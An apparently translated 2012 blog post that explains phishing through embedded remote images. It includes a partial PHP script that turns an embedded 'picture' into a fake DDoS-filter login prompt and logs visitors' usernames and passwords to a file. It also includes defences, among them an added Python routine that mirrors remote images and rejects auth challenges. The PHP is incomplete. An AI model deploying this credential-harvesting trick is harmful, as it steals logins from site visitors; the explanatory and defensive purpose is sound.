Wicked phishing pictures

It is true what they say: everything new is well-forgotten old.

Letting users embed remote resources (such as images from other websites) in the pages of your website is a very bad practice that may at some point lead to quite serious consequences for the website. I was surprised to read about this possibility as far back as 10 years ago. Now, 10 years later, nothing has changed, and it seems that it hardly ever will.

Theory and practice

1. The hacker, a malicious user, registers a domain that is spelled similarly to the target domain.
2. The hacker uploads a PHP script with the following content to that domain:

if (!isset($_SERVER['PHP_AUTH_USER'])) {
$vulnsite = parse_url($_SERVER['REFERER']);
//header('Content-Type: text/html; charset=windows-1251');
//header('WWW-Authenticate: Basic realm="'.ucfirst($vulnsite['host']).' DDoS-Filter: Enter your Login and Password"');
//header('HTTP/1.0 401 Unauthorized');
} else {
$f = fopen('passes.txt', 'a');
fwrite($f, $_SERVER['PHP_AUTH_USER'].';'.$_SERVER['PHP_AUTH_PW']."\r\n");
header("Content-type: image/jpeg");
$image = imagecreatefromjpeg('image.jpg');

// Accordingly, in the same folder is normal image.jpg
// Here you can play with the script extension and name it as superphoto.jpg.
3. The user writes an article and embeds the picture in the post:

<img src="" alt="image"/>
4. If the site has moderation, the article is sent for moderation.
5. Suppose the article turns out well, so it gets onto the homepage.
6. The hacker sees his creation on the homepage and uncomments the header lines in the PHP code. From then on, in response to the request for the picture in the post, any visitor's browser shows an authorization window. Its text can say anything, for instance that the site is fighting off a DDoS attack and asks the user to re-enter the login and password.
7. The user does not pay attention to the domain name shown in the authorization form and submits the username and password.
8. The hacker gets your username and password.

Protection methods

I think there are two methods:

• At the browser level: block authorization windows that come from another website.
• At the level of site developers: copy all remote resources to your own hosting.
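
One way to apply the second method, as an added example that is not part of the original post: find the remote images in a submitted post and judge each fetched response before storing a local copy. The host names, the `/media/mirror/` path and the function names are assumptions, and the fetch itself is left to the caller.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit

OWN_HOSTS = {"blog.example"}  # assumption: hosts this site serves images from
MAGIC = {b"\xff\xd8\xff": ".jpg", b"\x89PNG\r\n\x1a\n": ".png", b"GIF8": ".gif"}
# Constructed sample post: one local image, one on a look-alike domain.
SAMPLE_POST = ('<p>Hi</p><img src="/uploads/a.jpg">'
               '<img src="http://b1og.example/superphoto.jpg" alt="image"/>')


class ImgCollector(HTMLParser):
    """Collects the src of every <img> in a post body."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "img" and src:
            self.sources.append(src)


def remote_images(post_html, own_hosts=OWN_HOSTS):
    """Return img sources whose host is not one of the site's own."""
    collector = ImgCollector()
    collector.feed(post_html)
    remote = []
    for src in collector.sources:
        host = urlsplit(src).hostname  # None for relative URLs, lowercased otherwise
        if host and host not in own_hosts:
            remote.append(src)
    return remote


def mirror_decision(status, headers, body):
    """Judge a fetched response: ("store", local_path) or ("reject", reason)."""
    names = {k.lower() for k in headers}
    if status == 401 or "www-authenticate" in names:
        return ("reject", "auth challenge instead of an image")
    if status != 200:
        return ("reject", f"unexpected status {status}")
    for magic, ext in MAGIC.items():
        if body.startswith(magic):  # trust the bytes, not the URL or Content-Type
            name = hashlib.sha256(body).hexdigest()[:16] + ext
            return ("store", "/media/mirror/" + name)
    return ("reject", "body is not a JPEG, PNG or GIF")
```

Once the post references the stored copy, visitors' browsers never contact the remote host, so a later switch from image to 401 response reaches nobody.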

P.S. is no exception, because it has posts with pictures from other sites on its homepage. So just keep this trick in mind, and always check the domain name that requests the authorization.

There is always a potential risk that, while the image is on the homepage, the website the picture is linked from gets broken into solely in order to replace the image with the script.


I do not think that this is a bug.
This is nothing more than a trick that is officially allowed by the HTTP protocol.
ZimerMan 30 april 2012, 8:28